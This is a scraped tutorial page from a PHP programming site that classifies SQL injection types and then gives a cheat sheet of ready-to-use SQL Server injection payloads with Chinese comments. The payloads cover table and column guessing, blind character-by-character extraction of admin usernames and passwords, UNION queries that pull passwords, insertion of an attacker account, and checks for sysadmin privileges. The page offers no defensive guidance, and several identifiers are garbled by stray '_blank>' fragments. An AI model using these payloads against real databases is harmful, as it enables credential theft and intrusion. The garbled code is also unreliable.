There are three types of SQL injection statements, namely: 1. Numeric injection point, with statements such as "select * from table name where id=1 and 1=1"; 2. Character injection points, with statements such as " select * from table name where name..."; 3. Search injection point.

What is a sql injection statement?

The operating environment of this article: Windows 7 system, SQL Server 2016 version, Dell G3 computer.

Common SQL Injection Statements

SQL Injection

1. What is SQL Injection

By inserting SQL commands into Web forms Submit or enter the query string of the domain name or page request, and ultimately trick the server into executing malicious SQL commands.

2. SQL injection type

Classified according to injection point type

(1) Numeric injection point

Many web links have a similar structure http ://xxx.com/users.php?id=1 Injections based on this form are generally called digital injection points because the injection point ID type is a number. In most web pages, such as viewing the user's personal Information, viewing articles, etc., most of them use this form of structure to transfer information such as ID, hand it over to the backend, query the corresponding information in the database, and return it to the front desk. The prototype of this type of SQL statement is probably select * from table name where id=1 If there is injection, we can construct a SQL injection statement similar to the following for blasting: select * from table name where id=1 and 1=1

(2) Character injection point

The web link has a similar structure http://xxx.com/users.php?name= In the form of admin, the injection point name type is a character type, so it is called a character injection point. The prototype of this type of SQL statement is probably select * from table name where name='admin' It is worth noting that compared to the numeric injection type SQL statement prototype, there are more quotes, which can be single quotes. Or double quotes. If there is injection, we can construct a SQL injection statement similar to the following to blast: select * from table name where name='admin' and 1=1 ' We need to get rid of these annoying quotation marks .

(3) Search injection point

This is a special type of injection. This type of injection mainly refers to not filtering the search parameters when performing data searches. Generally, there are "keyword=keywords" in the link address. Some are not displayed in the link address, but directly through the search box. Form submission. The prototype of the SQL statement submitted by this type of injection point is roughly: select * from table name where field like '%keyword%' If there is injection, we can construct a SQL injection statement similar to the following. Explosion: select * from table name where fields like '%test%' and '%1%'='%1%'

Classify according to the method of data submission

(1) GET injection

The way to submit data is GET, and the location of the injection point is in the GET parameter section. For example, there is such a link http://xxx.com/news.php?id=1, id is the injection point.

(2) POST injection

Use POST method to submit data. The injection point is in the POST data part, which often occurs in forms.

HTTP request will bring the client's Cookie, and the injection point exists in a certain field in the Cookie.

(4) HTTP header injection

The injection point is in a certain field in the HTTP request header. For example, it exists in the User-Agent field. Strictly speaking, Cookie should actually be considered a form of header injection. Because during HTTP requests, Cookie is a field in the header.

Classified according to execution effect

is an injection that can determine whether the conditions are true or false based on the returned page.

That is, you cannot judge any information based on the content returned by the page. You can use conditional statements to check whether the time delay statement is executed (that is, whether the page return time increases).

(3) Injection based on error reporting

That is, the page will return error information, or the result of the injected statement will be returned directly to the page.

Single quotes
Double quotes
Based on numeric injection

(4) Union query injection

Injection in the case of union can be used.

Commonly used statements

1.判断有无注入点 
; and 1=1 and 1=2
2.猜表一般的表的名称无非是admin adminuser user pass password 等.. 
and 0<>(select count(*) from *) 
and 0<>(select count(*) from admin) ---判断是否存在admin这张表
3.猜帐号数目 如果遇到0< 返回正确页面 1<返回错误页面说明帐号数目就是1个 
and 0<(select count(*) from admin) 
and 1<(select count(*) from admin)
4.猜解字段名称 在len( ) 括号里面加上我们想到的字段名称. 
and 1=(select count(*) from admin where len(*)>0)-- 
and 1=(select count(*) from admin where len(用户字段名称name)>0) 
and 1=(select count(*) from admin where len(_blank>密码字段名称password)>0)
5.猜解各个字段的长度 猜解长度就是把>0变换 直到返回正确页面为止 
and 1=(select count(*) from admin where len(*)>0) 
and 1=(select count(*) from admin where len(name)>6) 错误 
and 1=(select count(*) from admin where len(name)>5) 正确 长度是6 
and 1=(select count(*) from admin where len(name)=6) 正确
and 1=(select count(*) from admin where len(password)>11) 正确 
and 1=(select count(*) from admin where len(password)>12) 错误 长度是12 
and 1=(select count(*) from admin where len(password)=12) 正确
6.猜解字符 
and 1=(select count(*) from admin where left(name,1)=a) ---猜解用户帐号的第一位 
and 1=(select count(*) from admin where left(name,2)=ab)---猜解用户帐号的第二位 
就这样一次加一个字符这样猜,猜到够你刚才猜出来的多少位了就对了,帐号就算出来了 
and 1=(select top 1 count(*) from Admin where Asc(mid(pass,5,1))=51) -- 
这个查询语句可以猜解中文的用户和_blank>密码.只要把后面的数字换成中文的ASSIC码就OK.最后把结果再转换成字符.
group by users.id having 1=1-- 
group by users.id, users.username, users.password, users.privs having 1=1-- 
; insert into users values( 666, attacker, foobar, 0xffff )--
UNION SELECT TOP 1 COLUMN_blank>_NAME FROM INFORMATION_blank>_SCHEMA.COLUMNS
WHERE TABLE_blank>_NAME=logintable- 
UNION SELECT TOP 1 COLUMN_blank>_NAME FROM INFORMATION_blank>_SCHEMA.COLUMNS
WHERE TABLE_blank>_NAME=logintable WHERE COLUMN_blank>_NAME NOT IN (login_blank
>_id)- 
UNION SELECT TOP 1 COLUMN_blank>_NAME FROM INFORMATION_blank>_SCHEMA.COLUMNS
WHERE TABLE_blank>_NAME=logintable WHERE COLUMN_blank>_NAME NOT IN (login_blank
>_id,login_blank>_name)- 
UNION SELECT TOP 1 login_blank>_name FROM logintable- 
UNION SELECT TOP 1 password FROM logintable where login_blank>_name=Rahul--
看_blank>服务器打的补丁=出错了打了SP4补丁 
and 1=(select @@VERSION)--
看_blank>数据库连接账号的权限，返回正常，证明是_blank>服务器角色sysadmin权限。 
and 1=(SELECT IS_blank>_SRVROLEMEMBER(sysadmin))--
判断连接_blank>数据库帐号。（采用SA账号连接 返回正常=证明了连接账号是SA） 
and sa=(SELECT System_blank>_user)-- 
and user_blank>_name()=dbo-- 
and 0<>(select user_blank>_name()--

Copy after login

Recommended (free): sql tutorial

The above is the detailed content of What is a sql injection statement?. For more information, please follow other related articles on the PHP Chinese website!

Statement of this Website

The content of this article is voluntarily contributed by netizens, and the copyright belongs to the original author. This site does not assume corresponding legal responsibility. If you find any content suspected of plagiarism or infringement, please contact admin@php.cn

Hot AI Tools

Undresser.AI Undress

AI-powered app for creating realistic nude photos

AI Clothes Remover

Online AI tool for removing clothes from photos.

Undress AI Tool

Undress images for free

Clothoff.io

AI clothes remover

AI Hentai Generator

Generate AI Hentai for free.

Hot Article

R.E.P.O. Energy Crystals Explained and What They Do (Yellow Crystal)

2 weeks ago By 尊渡假赌尊渡假赌尊渡假赌

How Long Does It Take To Beat Split Fiction?

1 months ago By DDD

R.E.P.O. Best Graphic Settings

2 weeks ago By 尊渡假赌尊渡假赌尊渡假赌

Assassin's Creed Shadows: Seashell Riddle Solution

1 weeks ago By DDD

R.E.P.O. How to Fix Audio if You Can't Hear Anyone

3 weeks ago By 尊渡假赌尊渡假赌尊渡假赌

Hot Tools

Notepad++7.3.1

Easy-to-use and free code editor

SublimeText3 Chinese version

Chinese version, very easy to use

Zend Studio 13.0.1

Powerful PHP integrated development environment

Dreamweaver CS6

Visual web development tools

SublimeText3 Mac version

God-level code editing software (SublimeText3)

Hot Topics

Where is the login entrance for gmail email?

7414

CakePHP Tutorial

1359

What is the format of the account name of steam

win11 activation key permanent

Related knowledge

What is the difference between HQL and SQL in Hibernate framework? Apr 17, 2024 pm 02:57 PM

HQL and SQL are compared in the Hibernate framework: HQL (1. Object-oriented syntax, 2. Database-independent queries, 3. Type safety), while SQL directly operates the database (1. Database-independent standards, 2. Complex executable queries and data manipulation).

Usage of division operation in Oracle SQL Mar 10, 2024 pm 03:06 PM

"Usage of Division Operation in OracleSQL" In OracleSQL, division operation is one of the common mathematical operations. During data query and processing, division operations can help us calculate the ratio between fields or derive the logical relationship between specific values. This article will introduce the usage of division operation in OracleSQL and provide specific code examples. 1. Two ways of division operations in OracleSQL In OracleSQL, division operations can be performed in two different ways.

Comparison and differences of SQL syntax between Oracle and DB2 Mar 11, 2024 pm 12:09 PM

Oracle and DB2 are two commonly used relational database management systems, each of which has its own unique SQL syntax and characteristics. This article will compare and differ between the SQL syntax of Oracle and DB2, and provide specific code examples. Database connection In Oracle, use the following statement to connect to the database: CONNECTusername/password@database. In DB2, the statement to connect to the database is as follows: CONNECTTOdataba

What does the identity attribute in SQL mean? Feb 19, 2024 am 11:24 AM

What is Identity in SQL? Specific code examples are needed. In SQL, Identity is a special data type used to generate auto-incrementing numbers. It is often used to uniquely identify each row of data in a table. The Identity column is often used in conjunction with the primary key column to ensure that each record has a unique identifier. This article will detail how to use Identity and some practical code examples. The basic way to use Identity is to use Identit when creating a table.

Detailed explanation of the Set tag function in MyBatis dynamic SQL tags Feb 26, 2024 pm 07:48 PM

Interpretation of MyBatis dynamic SQL tags: Detailed explanation of Set tag usage MyBatis is an excellent persistence layer framework. It provides a wealth of dynamic SQL tags and can flexibly construct database operation statements. Among them, the Set tag is used to generate the SET clause in the UPDATE statement, which is very commonly used in update operations. This article will explain in detail the usage of the Set tag in MyBatis and demonstrate its functionality through specific code examples. What is Set tag Set tag is used in MyBati

How does Java use the MySQL driver interceptor to implement SQL time-consuming calculations? May 27, 2023 pm 01:10 PM

Background: One of the company's needs is that the company's existing link tracking log component must support MySQL's SQL execution time printing. The common method to implement link tracking is to implement the interceptor interface or filter interface provided by a third-party framework or tool. MySQL is no exception. In fact, it just implements the interceptor interface driven by MySQL. There are different versions of MySQL channels, and the interceptor interfaces of different versions are different, so you need to implement the response interceptor according to the different versions of MySQL drivers you use. Next, we will introduce MySQL channels 5 and 6 respectively. 8 version implementation. MySQL5 is implemented here using MySQL channel 5.1.18 version as an example to implement Statem

How to solve the 5120 error in SQL Mar 06, 2024 pm 04:33 PM

Solution: 1. Check whether the logged-in user has sufficient permissions to access or operate the database, and ensure that the user has the correct permissions; 2. Check whether the account of the SQL Server service has permission to access the specified file or folder, and ensure that the account Have sufficient permissions to read and write the file or folder; 3. Check whether the specified database file has been opened or locked by other processes, try to close or release the file, and rerun the query; 4. Try as administrator Run Management Studio as etc.

How to implement Springboot+Mybatis-plus without using SQL statements to add multiple tables Jun 02, 2023 am 11:07 AM

When Springboot+Mybatis-plus does not use SQL statements to perform multi-table adding operations, the problems I encountered are decomposed by simulating thinking in the test environment: Create a BrandDTO object with parameters to simulate passing parameters to the background. We all know that it is extremely difficult to perform multi-table operations in Mybatis-plus. If you do not use tools such as Mybatis-plus-join, you can only configure the corresponding Mapper.xml file and configure The smelly and long ResultMap, and then write the corresponding sql statement. Although this method seems cumbersome, it is highly flexible and allows us to

See all articles